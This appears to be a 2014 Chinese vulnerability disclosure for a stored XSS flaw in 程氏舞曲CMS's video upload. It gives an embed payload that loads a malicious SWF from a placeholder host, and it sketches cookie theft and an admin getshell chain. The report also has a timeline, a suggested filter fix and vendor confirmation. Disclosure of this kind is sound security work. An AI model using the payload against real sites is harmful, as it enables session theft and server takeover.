漏洞概要
关注数(24)
关注此漏洞
漏洞标题:程氏舞曲CMS储存型 xss(5)
提交时间:2014-06-09 17:04
修复时间:2014-09-07 17:06
公开时间:2014-09-07 17:06
漏洞类型:xss跨站脚本攻击
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2014-06-09: 细节已通知厂商并且等待厂商处理中
2014-06-09: 厂商已经确认,细节仅向厂商公开
2014-06-12: 细节向第三方安全合作伙伴开放
2014-08-03: 细节向核心白帽子及相关领域专家公开
2014-08-13: 细节向普通白帽子公开
2014-08-23: 细节向实习白帽子公开
2014-09-07: 细节向公众公开
简要描述:
rt,swf啊。。
详细说明:
上传视频处 。对于外部swf文件 过分信任
可插入 如下代码
<embed src=http://xxx.xxx/xss.swf type="application/x-shockwave-flash" allowfullscreen="true" allownetworking="all" allowscriptaccess="always">
构造 恶意的 swf 执行 js
像这样 alert
这是 获取cookie的swf代码
后台可以getshell
http://localhost/index.php/admin/skins/save
post如下数据
getshell
我们 可以 swf加载个 远程js
js代码为
cors是可以跨域传输数据的。从而 后台审核视频文章时 getshell
漏洞证明:
修复方案:
过滤 allowfullscreen="true" allownetworking="all" allowscriptaccess="always"
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2014-06-09 18:51
厂商回复:
检查 漏洞确实存在,
我们会立即修复~!
感谢您的检测~!
最新状态:
2014-06-10:已经修复~!